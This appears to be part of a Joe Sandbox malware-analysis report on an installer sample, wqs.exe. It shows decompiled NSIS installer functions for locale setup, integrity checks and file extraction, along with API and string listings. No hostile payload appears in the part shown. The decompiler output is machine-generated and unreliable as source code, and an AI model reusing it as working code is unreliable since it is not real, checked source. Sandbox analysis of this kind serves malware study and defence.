				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t41 =  *0x433ee0; // 0x0
							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75B53420), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

RichEd20, xrefs: 00403E1A
RichEdit, xrefs: 00403E47
_Nb, xrefs: 00403D70, 00403DD8
.exe, xrefs: 00403CFA
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
.DEFAULT\Control Panel\International, xrefs: 00403C58
RichEdit20W, xrefs: 00403E38, 00403E3E
C:\Users\user\AppData\Local\Temp, xrefs: 00403C7C, 00403C84, 00403D27, 00403D2D, 00403D3D
RichEd32, xrefs: 00403E28
1033, xrefs: 00403C0C, 00403C68
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
Call, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1862882193
Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\AppData\\Roaming\\wqs.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, _t91);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x434f14 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004034CF(0x416a18, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x434f14 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41ea18; // 0x52c3a
							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x434f14 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42aa24) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031fe
0x00000000
0x00000000
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x00403251
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x0040321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403127
0x00403129
0x00403129
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x00403141
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403157
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a7
0x004031af
0x004031b2
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004031a7
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\wqs.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\wqs.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\AppData\Roaming\wqs.exe,C:\Users\user\AppData\Roaming\wqs.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

Error launching installer, xrefs: 004030CD
}8@, xrefs: 00403227, 00403242
soft, xrefs: 0040316B
C:\Users\user\AppData\Roaming\wqs.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
Inst, xrefs: 00403162
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
Null, xrefs: 00403174

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\wqs.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-2868854434
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x425a20
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x425a20
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

... %d%%, xrefs: 004033FB
}8@, xrefs: 004032B4
*B, xrefs: 004032DF
A, xrefs: 0040347E
A, xrefs: 00403374
ZB, xrefs: 004033A2, 004033BD, 0040343A

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ ZB$ A$ A$... %d%%$}8@
API String ID: 551687249-3683892814
Opcode ID: 3bb00b159343602b5baf8216f2e6fd7ccfc314744640e4b330e170589aabe739
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: 3bb00b159343602b5baf8216f2e6fd7ccfc314744640e4b330e170589aabe739
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nstC2CA.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nstC2CA.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nstC2CA.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nstC2CA.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8));
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24);
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
